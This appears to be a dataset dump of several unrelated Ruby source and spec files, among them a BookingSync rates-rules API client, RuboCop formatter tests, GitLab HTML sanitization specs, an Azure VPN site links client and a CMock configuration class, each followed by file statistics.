'HTTP_AUTHORIZATION' => 'Bearer valid_token',
:params => {:access_token => 'valid_token'}
)
end
it_behaves_like :bad_bearer_request
end
end
end
| 32.41129 | 127 | 0.675292 |
ac49cd74c6e78258c5571302108ca64bdf84a09f | 2,723 | module BookingSync::API
class Client
module RatesRules
# List rates rules
#
# Returns rates rules for the account user is authenticated with.
# @param options [Hash] A customizable set of options.
# @option options [Array] fields: List of fields to be fetched.
# @return [Array<BookingSync::API::Resource>] Array of rates rules.
#
# @example Get the list of rates rules for the current account
# rates_rules = @api.rates_rules
# rates_rules.first.always_applied # => true
# @example Get the list of rates rules only with always_applied and kind for smaller response
# @api.rates_rules(fields: [:always_applied, :kind])
# @see http://docs.api.bookingsync.com/reference/endpoints/rates_rules/#list-rates-rules
def rates_rules(options = {}, &block)
paginate :rates_rules, options, &block
end
# Get a single rates_rule
#
# @param rates_rule [BookingSync::API::Resource|Integer] RatesRule or ID
# of the rates_rule.
# @param options [Hash] A customizable set of query options.
# @option options [Array] fields: List of fields to be fetched.
# @return [BookingSync::API::Resource]
def rates_rule(rates_rule, options = {})
get("rates_rules/#{rates_rule}", options).pop
end
# Create a new rates_rule
#
# @param rates_table [BookingSync::API::Resource|Integer] RatesTable or ID of
# the rates_table for which rates_rule will be created.
# @param options [Hash] RatesRule's attributes.
# @return [BookingSync::API::Resource] Newly created rates_rule.
def create_rates_rule(rates_table, options = {})
post("rates_tables/#{rates_table}/rates_rules", rates_rules: [options]).pop
end
# Edit a rates_rule
#
# @param rates_rule [BookingSync::API::Resource|Integer] RatesRule or ID of
# the rates_rule to be updated.
# @param options [Hash] RatesRule attributes to be updated.
# @return [BookingSync::API::Resource] Updated rates_rule on success,
# exception is raised otherwise.
# @example
# rates_rule = @api.rates_rules.first
# @api.edit_rates_rule(rates_rule, { percentage: 10 })
def edit_rates_rule(rates_rule, options = {})
put("rates_rules/#{rates_rule}", rates_rules: [options]).pop
end
# Delete a rates_rule
#
# @param rates_rule [BookingSync::API::Resource|Integer] RatesRule or ID
# of the rates_rule to be deleted.
# @return [NilClass] Returns nil on success.
def delete_rates_rule(rates_rule)
delete "rates_rules/#{rates_rule}"
end
end
end
end
| 40.641791 | 99 | 0.654425 |
4af705a2d0125213a0795bb335511a5a1fb12ef4 | 816 | # frozen_string_literal: true
require 'rails_helper'
# Specs for Services::Payu::Signature, which signs a request-parameter hash
# for the PayU payment gateway.
describe Services::Payu::Signature do
  let(:service) { described_class.new({}) }

  describe '#call' do
    let(:source) { double(:source) }

    subject { service.call }

    before do
      # Stub the serialization step so #call only exercises the signing part.
      allow(service).to receive(:bytesized_hash).and_return source
    end

    it 'should use MD5 for encoding' do
      # NOTE(review): MD5 is cryptographically weak; presumably PayU's legacy
      # API mandates it — confirm this is still the required algorithm.
      expect(HMAC::MD5).to receive_message_chain(:new, :update, :hexdigest) # receive(:hexdigest).with(source)
      subject
    end
  end

  describe '#bytesized_hash' do
    let(:hash) do
      {
        amount: '1234',
        testorder: 'FALSE'
      }
    end
    # Expected base string: value length prepended to the value ("4" + "1234").
    # NOTE(review): :testorder appears to be excluded from the signature base —
    # verify against the implementation's field whitelist.
    let(:value) { '41234' }

    subject { service.send(:bytesized_hash) }

    before do
      # bytesized_hash reads the params from @hash, set in the constructor.
      service.instance_variable_set(:@hash, hash)
    end

    it { is_expected.to eq value }
  end
end
| 20.4 | 110 | 0.634804 |
ab3c59b12355f4ff1193aaf90a507b32fbcbaeaa | 4,754 | # frozen_string_literal: true
RSpec.describe RuboCop::Formatter::TapFormatter do
subject(:formatter) { described_class.new(output) }
let(:output) { StringIO.new }
let(:files) do
%w[lib/rubocop.rb spec/spec_helper.rb exe/rubocop].map do |path|
File.expand_path(path)
end
end
describe '#file_finished' do
before do
formatter.started(files)
formatter.file_started(files.first, {})
formatter.file_finished(files.first, offenses)
end
context 'when no offenses are detected' do
let(:offenses) { [] }
it 'prints "ok"' do
expect(output.string).to include('ok 1')
end
end
context 'when any offenses are detected' do
let(:offenses) do
source_buffer = Parser::Source::Buffer.new('test', 1)
source = Array.new(9) { |index| "This is line #{index + 1}." }
source_buffer.source = source.join("\n")
line_length = source[0].length + 1
[
RuboCop::Cop::Offense.new(
:convention,
Parser::Source::Range.new(source_buffer,
line_length + 2,
line_length + 3),
'foo',
'Cop'
)
]
end
it 'prints "not ok"' do
expect(output.string).to include('not ok 1')
end
end
end
describe '#finished' do
before { formatter.started(files) }
context 'when any offenses are detected' do
before do
source_buffer = Parser::Source::Buffer.new('test', 1)
source = Array.new(9) { |index| "This is line #{index + 1}." }
source_buffer.source = source.join("\n")
line_length = source[0].length + 1
formatter.file_started(files[0], {})
formatter.file_finished(
files[0],
[
RuboCop::Cop::Offense.new(
:convention,
Parser::Source::Range.new(source_buffer,
line_length + 2,
line_length + 3),
'foo',
'Cop'
)
]
)
formatter.file_started(files[1], {})
formatter.file_finished(files[1], [])
formatter.file_started(files[2], {})
formatter.file_finished(
files[2],
[
RuboCop::Cop::Offense.new(
:error,
Parser::Source::Range.new(source_buffer,
(4 * line_length) + 1,
(4 * line_length) + 2),
'bar',
'Cop'
),
RuboCop::Cop::Offense.new(
:convention,
Parser::Source::Range.new(source_buffer,
5 * line_length,
(5 * line_length) + 1),
'foo',
'Cop'
)
]
)
end
it 'reports all detected offenses for all failed files' do
formatter.finished(files)
expect(output.string).to include(<<~OUTPUT)
1..3
not ok 1 - lib/rubocop.rb
# lib/rubocop.rb:2:3: C: [Correctable] foo
# This is line 2.
# ^
ok 2 - spec/spec_helper.rb
not ok 3 - exe/rubocop
# exe/rubocop:5:2: E: [Correctable] bar
# This is line 5.
# ^
# exe/rubocop:6:1: C: [Correctable] foo
# This is line 6.
# ^
OUTPUT
end
end
context 'when no offenses are detected' do
before do
files.each do |file|
formatter.file_started(file, {})
formatter.file_finished(file, [])
end
end
it 'does not report offenses' do
formatter.finished(files)
expect(output.string).not_to include('not ok')
end
end
end
describe '#report_file', :config do
let(:cop_class) { RuboCop::Cop::Cop }
let(:output) { StringIO.new }
before { cop.send(:begin_investigation, processed_source) }
context 'when the source contains multibyte characters' do
let(:source) do
<<~RUBY
do_something("あああ", ["いいい"])
RUBY
end
it 'displays text containing the offending source line' do
location = source_range(source.index('[')..source.index(']'))
cop.add_offense(nil, location: location, message: 'message 1')
formatter.report_file('test', cop.offenses)
expect(output.string)
.to eq <<~OUTPUT
# test:1:21: C: message 1
# do_something("あああ", ["いいい"])
# ^^^^^^^^^^
OUTPUT
end
end
end
end
| 27.964706 | 70 | 0.500421 |
039ca36af6ea79f0a984d88ae27cd45badfd6a45 | 5,565 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Banzai::Filter::SanitizationFilter do
include FilterSpecHelper
it_behaves_like 'default allowlist'
describe 'custom allowlist' do
it_behaves_like 'XSS prevention'
it_behaves_like 'sanitize link'
it 'customizes the allowlist only once' do
instance = described_class.new('Foo')
control_count = instance.allowlist[:transformers].size
3.times { instance.allowlist }
expect(instance.allowlist[:transformers].size).to eq control_count
end
it 'customizes the allowlist only once for different instances' do
instance1 = described_class.new('Foo1')
instance2 = described_class.new('Foo2')
control_count = instance1.allowlist[:transformers].size
instance1.allowlist
instance2.allowlist
expect(instance1.allowlist[:transformers].size).to eq control_count
expect(instance2.allowlist[:transformers].size).to eq control_count
end
it 'sanitizes `class` attribute from all elements' do
act = %q(<pre class="code highlight white c"><code><span class="k">def</span></code></pre>)
exp = %q(<pre><code><span class="k">def</span></code></pre>)
expect(filter(act).to_html).to eq exp
end
it 'sanitizes `class` attribute from non-highlight spans' do
act = %q(<span class="k">def</span>)
expect(filter(act).to_html).to eq %q(<span>def</span>)
end
it 'allows `text-align` property in `style` attribute on table elements' do
html = <<~HTML
<table>
<tr><th style="text-align: center">Head</th></tr>
<tr><td style="text-align: right">Body</th></tr>
</table>
HTML
doc = filter(html)
expect(doc.at_css('th')['style']).to eq 'text-align: center'
expect(doc.at_css('td')['style']).to eq 'text-align: right'
end
it 'disallows other properties in `style` attribute on table elements' do
html = <<~HTML
<table>
<tr><th style="text-align: foo">Head</th></tr>
<tr><td style="position: fixed; height: 50px; width: 50px; background: red; z-index: 999; font-size: 36px; text-align: center">Body</th></tr>
</table>
HTML
doc = filter(html)
expect(doc.at_css('th')['style']).to be_nil
expect(doc.at_css('td')['style']).to eq 'text-align: center'
end
it 'disallows `text-align` property in `style` attribute on other elements' do
html = <<~HTML
<div style="text-align: center">Text</div>
HTML
doc = filter(html)
expect(doc.at_css('div')['style']).to be_nil
end
it 'allows `span` elements' do
exp = act = %q(<span>Hello</span>)
expect(filter(act).to_html).to eq exp
end
it 'allows `abbr` elements' do
exp = act = %q(<abbr title="HyperText Markup Language">HTML</abbr>)
expect(filter(act).to_html).to eq exp
end
it 'disallows the `name` attribute globally, allows on `a`' do
html = <<~HTML
<img name="getElementById" src="">
<span name="foo" class="bar">Hi</span>
<a name="foo" class="bar">Bye</a>
HTML
doc = filter(html)
expect(doc.at_css('img')).not_to have_attribute('name')
expect(doc.at_css('span')).not_to have_attribute('name')
expect(doc.at_css('a')).to have_attribute('name')
end
it 'allows `summary` elements' do
exp = act = '<summary>summary line</summary>'
expect(filter(act).to_html).to eq exp
end
it 'allows `details` elements' do
exp = act = '<details>long text goes here</details>'
expect(filter(act).to_html).to eq exp
end
it 'allows `rel=license` in links' do
exp = act = '<a rel="license" href="http://example.com">rel-license</a>'
expect(filter(act).to_html).to eq exp
end
it 'allows `data-math-style` attribute on `code` and `pre` elements' do
html = <<-HTML
<pre class="code" data-math-style="inline">something</pre>
<code class="code" data-math-style="inline">something</code>
<div class="code" data-math-style="inline">something</div>
HTML
output = <<-HTML
<pre data-math-style="inline">something</pre>
<code data-math-style="inline">something</code>
<div>something</div>
HTML
expect(filter(html).to_html).to eq(output)
end
it 'allows the `data-sourcepos` attribute globally' do
exp = %q(<p data-sourcepos="1:1-1:10">foo/bar.md</p>)
act = filter(exp)
expect(act.to_html).to eq exp
end
describe 'footnotes' do
it 'allows correct footnote id property on links' do
exp = %q(<a href="#fn-first" id="fnref-first">foo/bar.md</a>)
act = filter(exp)
expect(act.to_html).to eq exp
end
it 'allows correct footnote id property on li element' do
exp = %q(<ol><li id="fn-last">footnote</li></ol>)
act = filter(exp)
expect(act.to_html).to eq exp
end
it 'removes invalid id for footnote links' do
exp = %q(<a href="#fn1">link</a>)
%w[fnrefx test xfnref-1].each do |id|
act = filter(%(<a href="#fn1" id="#{id}">link</a>))
expect(act.to_html).to eq exp
end
end
it 'removes invalid id for footnote li' do
exp = %q(<ol><li>footnote</li></ol>)
%w[fnx test xfn-1].each do |id|
act = filter(%(<ol><li id="#{id}">footnote</li></ol>))
expect(act.to_html).to eq exp
end
end
end
end
end
| 30.409836 | 151 | 0.610782 |
f7bffedcd4c54021b9f9b9feaea83e94a17fd02e | 979 | module VHP
module YMLHelper
# Load YML the way we expect: symbolized names,
# even if they specified symbols or not
def load_yml_the_vhp_way(f)
YAML.load(File.read(f), symbolize_names: true)
end
# Expected: a cve_yml hash, key of commits
# Returns: every commit sha in the fixes hash
#
# e.g. when the YML has
# fixes:
# - commit: abc
# note:
# - commit:
# note:
# extract_shas_from_commitlist(h, :fixes) => ['abc']
def extract_shas_from_commitlist(h, key)
unless h.key? key
warn "ERROR Malformed CVE YML? #{h[:CVE]} should have a `fixes` key. Skipping. Hash: #{h}"
return []
end
begin
shs = h[key].inject([]) do |memo, fix|
memo << fix[:commit] unless fix[:commit].to_s.strip.empty?
memo
end
rescue => e
warn "ERROR extracting YML info for #{h[:CVE]}: #{e.message}"
return []
end
end
end
end
| 26.459459 | 98 | 0.572012 |
014e57b7a3c8cba42f63a210b411f1d005b042bd | 243 | # frozen_string_literal: true
module Spring
  module Commands
    # Spring command definition for the `coach` executable.
    class Coach
      # Spring always boots this command in the development environment.
      def env(*)
        "development"
      end

      # Name of the binstub Spring should exec for this command.
      def exec_name
        "coach"
      end
    end

    # Register the command as soon as the class is defined at load time.
    Spring.register_command "coach", Coach.new
  end
end
| 13.5 | 48 | 0.596708 |
1d80735733dbb0c8ad2b715121c208b96d280afe | 14,639 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_04_01
#
# VpnSiteLinks
#
class VpnSiteLinks
include MsRestAzure
#
# Creates and initializes a new instance of the VpnSiteLinks class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [NetworkManagementClient] reference to the NetworkManagementClient
attr_reader :client
#
# Retrieves the details of a VPN site link.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param vpn_site_link_name [String] The name of the VpnSiteLink being
# retrieved.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [VpnSiteLink] operation results.
#
def get(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:nil)
response = get_async(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Retrieves the details of a VPN site link.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param vpn_site_link_name [String] The name of the VpnSiteLink being
# retrieved.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:nil)
get_async(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:custom_headers).value!
end
#
# Retrieves the details of a VPN site link.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param vpn_site_link_name [String] The name of the VpnSiteLink being
# retrieved.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'vpn_site_name is nil' if vpn_site_name.nil?
fail ArgumentError, 'vpn_site_link_name is nil' if vpn_site_link_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnSites/{vpnSiteName}/vpnSiteLinks/{vpnSiteLinkName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'vpnSiteName' => vpn_site_name,'vpnSiteLinkName' => vpn_site_link_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2020_04_01::Models::VpnSiteLink.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<VpnSiteLink>] operation results.
#
def list_by_vpn_site(resource_group_name, vpn_site_name, custom_headers:nil)
first_page = list_by_vpn_site_as_lazy(resource_group_name, vpn_site_name, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_vpn_site_with_http_info(resource_group_name, vpn_site_name, custom_headers:nil)
list_by_vpn_site_async(resource_group_name, vpn_site_name, custom_headers:custom_headers).value!
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_vpn_site_async(resource_group_name, vpn_site_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'vpn_site_name is nil' if vpn_site_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnSites/{vpnSiteName}/vpnSiteLinks'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'vpnSiteName' => vpn_site_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2020_04_01::Models::ListVpnSiteLinksResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ListVpnSiteLinksResult] operation results.
#
def list_by_vpn_site_next(next_page_link, custom_headers:nil)
response = list_by_vpn_site_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_vpn_site_next_with_http_info(next_page_link, custom_headers:nil)
list_by_vpn_site_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_vpn_site_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2020_04_01::Models::ListVpnSiteLinksResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ListVpnSiteLinksResult] which provide lazy access to pages of the
# response.
#
def list_by_vpn_site_as_lazy(resource_group_name, vpn_site_name, custom_headers:nil)
response = list_by_vpn_site_async(resource_group_name, vpn_site_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_vpn_site_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 43.960961 | 183 | 0.702234 |
185d8b5a891911551428cda28c250ece95e6b507 | 2,686 | require File.expand_path('../boot', __FILE__)
# Pick the frameworks you want:
require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "active_resource/railtie"
require "sprockets/railtie"
# require "rails/test_unit/railtie"
if defined?(Bundler)
# If you precompile assets before deploying to production, use this line
Bundler.require(*Rails.groups(:assets => %w(development test)))
# If you want your assets lazily compiled in production, use this line
# Bundler.require(:default, :assets, Rails.env)
end
# Top-level namespace for the Rabel Rails application.
module Rabel
  # Application-wide configuration (Rails 3.x era APIs: whitelist_attributes,
  # config.plugins, assets.initialize_on_precompile).
  class Application < Rails::Application
    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.
    # Custom directories with classes and modules you want to be autoloadable.
    config.autoload_paths += %W(#{config.root}/lib)
    # Only load the plugins named here, in the order given (default is alphabetical).
    # :all can be used as a placeholder for all plugins not explicitly named.
    # config.plugins = [ :exception_notification, :ssl_requirement, :all ]
    # Activate observers that should always be running.
    # config.active_record.observers = :cacher, :garbage_collector, :forum_observer
    # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
    # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
    config.time_zone = 'Beijing'
    # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
    # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
    config.i18n.load_path += Dir[Rails.root.join('config', 'locales', '**', '*.yml')]
    config.i18n.default_locale = :zh
    # Configure the default encoding used in templates for Ruby 1.9.
    config.encoding = "utf-8"
    # Configure sensitive parameters which will be filtered from the log file.
    config.filter_parameters += [:password, :password_confirmation]
    # Enable the asset pipeline
    config.assets.enabled = true
    # Version of your assets, change this if you want to expire all your assets
    config.assets.version = '1.0'
    # Also look up theme assets (images/stylesheets/javascripts) outside app/assets.
    config.assets.paths += %W(#{config.root}/themes/images #{config.root}/themes/stylesheets #{config.root}/themes/javascripts)
    # Enable whitelist mass assignment protection by default
    config.active_record.whitelist_attributes = true
    # Don't access the DB when precompiling the assets
    config.assets.initialize_on_precompile = false
  end
end
ed9864b60ab546cad7e2710125705e279d81e501 | 4,943 | # ==========================================
# CMock Project - Automatic Mock Generation for C
# Copyright (c) 2007 Mike Karlesky, Mark VanderVoord, Greg Williams
# [Released under MIT License. Please refer to license.txt for details]
# ==========================================
class CMockConfig

  # Baseline option set used whenever the caller does not override a key.
  # (Constant name and contents are part of the public API; do not rename.)
  CMockDefaultOptions =
  {
    :framework                   => :unity,
    :mock_path                   => 'mocks',
    :mock_prefix                 => 'Mock',
    :plugins                     => [],
    :strippables                 => ['(?:__attribute__\s*\(+.*?\)+)'],
    :attributes                  => ['__ramfunc', '__irq', '__fiq', 'register', 'extern'],
    :c_calling_conventions       => ['__stdcall', '__cdecl', '__fastcall'],
    :enforce_strict_ordering     => false,
    :unity_helper_path           => false,
    :treat_as                    => {},
    :treat_as_void               => [],
    :memcmp_if_unknown           => true,
    :when_no_prototypes          => :warn,           # options: :ignore, :warn, or :error
    :when_ptr                    => :compare_data,   # options: :compare_ptr, :compare_data, or :smart
    :verbosity                   => 2,               # 0 errors only, 1 warnings and errors, 2 normal info, 3 verbose
    :treat_externs               => :exclude,        # options: :include or :exclude
    :ignore                      => :args_and_calls, # options: :args_and_calls or :args_only
    :callback_include_count      => true,
    :callback_after_arg_check    => false,
    :includes                    => nil,
    :includes_h_pre_orig_header  => nil,
    :includes_h_post_orig_header => nil,
    :includes_c_pre_header       => nil,
    :includes_c_post_header      => nil
  }

  # Builds a configuration from nothing (all defaults), a YAML file path, or a
  # Hash of overrides. Every resulting option becomes a reader method on this
  # instance (e.g. +mock_prefix+, +plugins+, +treat_as+).
  #
  # @param options [nil, String, Hash] defaults / YAML filename / override hash
  # @raise [RuntimeError] when options is any other type
  def initialize(options=nil)
    options = case options
              when NilClass then CMockDefaultOptions.clone
              when String   then CMockDefaultOptions.clone.merge(load_config_file_from_yaml(options))
              when Hash     then CMockDefaultOptions.clone.merge(options)
              else raise "If you specify arguments, it should be a filename or a hash of options"
              end

    # These options must always be arrays; coerce bad values to [] (warning
    # printed unless verbosity is 0) so generation code can iterate safely.
    [:plugins, :attributes, :treat_as_void].each do |opt|
      unless options[opt].is_a?(Array)
        options[opt] = []
        puts "WARNING: :#{opt.to_s} should be an array." unless (options[:verbosity] < 1)
      end
    end

    # Include-list options may be nil (feature disabled) or an array, nothing else.
    [:includes, :includes_h_pre_orig_header, :includes_h_post_orig_header, :includes_c_pre_header, :includes_c_post_header].each do |opt|
      unless options[opt].nil? || options[opt].is_a?(Array)
        options[opt] = []
        puts "WARNING: :#{opt.to_s} should be an array." unless (options[:verbosity] < 1)
      end
    end

    # Accept the legacy :unity_helper key as an alias for :unity_helper_path.
    options[:unity_helper_path] ||= options[:unity_helper]

    options[:plugins].compact!
    options[:plugins].map! { |p| p.to_sym }

    @options = options

    # Overlay user-supplied type mappings on top of the standard ones.
    treat_as_map = standard_treat_as_map
    treat_as_map.merge!(@options[:treat_as])
    @options[:treat_as] = treat_as_map

    # Define one reader per option. define_singleton_method replaces the old
    # string eval: no eval, and readers are scoped to this instance instead of
    # being redefined class-wide on every instantiation.
    @options.each_key do |key|
      define_singleton_method(key) { @options[key] }
    end
  end

  # Loads the :cmock section of a YAML project file.
  def load_config_file_from_yaml yaml_filename
    require 'yaml'
    require 'fileutils' # retained: callers may rely on FileUtils being loaded
    YAML.load_file(yaml_filename)[:cmock]
  end

  # Records the source path of the header currently being processed.
  def set_path(path)
    @src_path = path
  end

  # Returns the contents of the configured unity helper file, or nil when no
  # helper path was configured.
  def load_unity_helper
    return File.new(@options[:unity_helper_path]).read if (@options[:unity_helper_path])
    return nil
  end

  # Canonical C type -> Unity assertion suffix mapping; user :treat_as entries
  # are merged over this in #initialize.
  def standard_treat_as_map
    {
      'int'             => 'INT',
      'char'            => 'INT8',
      'short'           => 'INT16',
      'long'            => 'INT',
      'int8'            => 'INT8',
      'int16'           => 'INT16',
      'int32'           => 'INT',
      'int8_t'          => 'INT8',
      'int16_t'         => 'INT16',
      'int32_t'         => 'INT',
      'INT8_T'          => 'INT8',
      'INT16_T'         => 'INT16',
      'INT32_T'         => 'INT',
      'bool'            => 'INT',
      'bool_t'          => 'INT',
      'BOOL'            => 'INT',
      'BOOL_T'          => 'INT',
      'unsigned int'    => 'HEX32',
      'unsigned long'   => 'HEX32',
      'uint32'          => 'HEX32',
      'uint32_t'        => 'HEX32',
      'UINT32'          => 'HEX32',
      'UINT32_T'        => 'HEX32',
      'void*'           => 'PTR',
      'unsigned short'  => 'HEX16',
      'uint16'          => 'HEX16',
      'uint16_t'        => 'HEX16',
      'UINT16'          => 'HEX16',
      'UINT16_T'        => 'HEX16',
      'unsigned char'   => 'HEX8',
      'uint8'           => 'HEX8',
      'uint8_t'         => 'HEX8',
      'UINT8'           => 'HEX8',
      'UINT8_T'         => 'HEX8',
      'char*'           => 'STRING',
      'pCHAR'           => 'STRING',
      'cstring'         => 'STRING',
      'CSTRING'         => 'STRING',
